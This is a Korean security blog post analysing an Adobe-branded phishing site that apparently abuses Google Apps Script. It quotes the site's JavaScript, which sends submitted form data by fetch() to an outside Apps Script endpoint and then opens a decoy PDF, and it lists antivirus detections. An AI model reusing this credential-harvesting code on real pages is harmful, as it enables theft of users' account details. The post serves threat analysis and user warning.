Google Apps Script(구글 앱 스크립트) 이라는 것은 구글 워크스페이스 플랫폼에서 가벼운 애플리케이션 개발을 위해 구글이 개발한 스크립팅 플랫폼 입니다. 이를 악용을 하는 피싱 사이트
https://pdf-27e04.web(.)app/에 대해 한번 글을 적어 보겠습니다.
일단 해당 사이트에 접속하면 어도비에서 관리하는 사이트로 돼 있지만 실제로는 어도비가 아니고 어도비 계정을 탈취하기 위해서 제작을 한 것이 아닐까 생각이 되지만 가짜 번호를 넣고 로그인을 해보면 PDF 관련 내용을 보면 송장이 비슷한 것이 있는 것을 확인할 수가 있었습니다
일단 웹 소스를 보면 다음과 같이 항목이 존재하는 것을 볼 수가 있습니다.
<script type="text/javascript">
const scriptURL = 'https://script.google(.)com/macros/s/AKfycbzvKjnCcnAkYgMb9RXPYnLHVj2Owf36SZn4WHbLngFdrMCpIbu0AO5EjDdvyLEO41I/exec'
const form = document.forms['google-sheet']
form.addEventListener('submit', e => {
e.preventDefault()
fetch(scriptURL, { method: 'POST', body: new FormData(form)})
.then(() => {
const redirectUrl = 'http://members.optusnet(.)com.au/blaircastle2/TT.pdf';
const link = document.createElement('a');
link.href = redirectUrl;
link.click();
})
.catch((error) => console.error('Error!', error.message));
})
</script>
즉 개인정보를 입력하면 http://members.optusnet(.)com.au/blaircastle2/TT.pdf 라는 PDF 파일을 열게 돼 있는 것을 볼 수가 있으며 해당 사이트에 접속하면 보안 제품과 브라우저에서 제공하는 피싱 사이트 차단에서 차단이 정상적으로 되는 것을 볼 수가 있습니다.
그리고 HTTP Debugger Pro로 보면 다음과 같이 개인정보가 전송된 것을 확인할 수가 있습니다.
VirusTotal 2022-04-26 10:18:09 UTC 기준으로 탐지하는 업체들은 다음과 같습니다.
BitDefender:Phishing
Emsisoft:Phishing
ESET:Phishing
G-Data:Phishing
Lionic:Phishing
Netcraft:Malicious
Phishtank:Phishing
Sophos:Malware
Trustwave:Phishing
Webroot:Malicious
Certego:Suspicious
대부분 피싱로 정상적으로 탐지하고 있으며 기본적으로 백신 프로그램과 브라우저에서 제공하는 피싱 사이트 차단 기능을 활성화해서 사용을 해야 하면 함부로 링크를 클릭하는 것을 자제하는 것을 권장합니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 파이어폭스 100(Firefox 100) 보안 업데이트 (6) | 2022.05.06 |
|---|---|
| 파이어폭스 100 새로운 기능 추가 (4) | 2022.05.04 |
| 코로나 19 새희망 자금으로 위장 하고 있는 보이스피싱 앱-newhopefund.apk(새희망.apk) (6) | 2022.05.02 |
| Microsoft Edge(마이크로소프트 엣지)보안 네트워크 1기가 무료 VPN 실험중 (6) | 2022.04.29 |
| 윈도우 10 KB5012636 누적 업데이트 프리징 문제 수정 (2) | 2022.04.26 |
| Protonmail(프로톤메일) Proton.me 이메일 주소 제공 시작 (6) | 2022.04.25 |
| 마이크로소프트 윈도우 SMB1 클라이언트를 비활성화 계획 (0) | 2022.04.23 |
| 가상화폐 업체 업비트 사칭 카카오톡 계정 정보 노리는 피싱 사이트-aveiga (2) | 2022.04.22 |
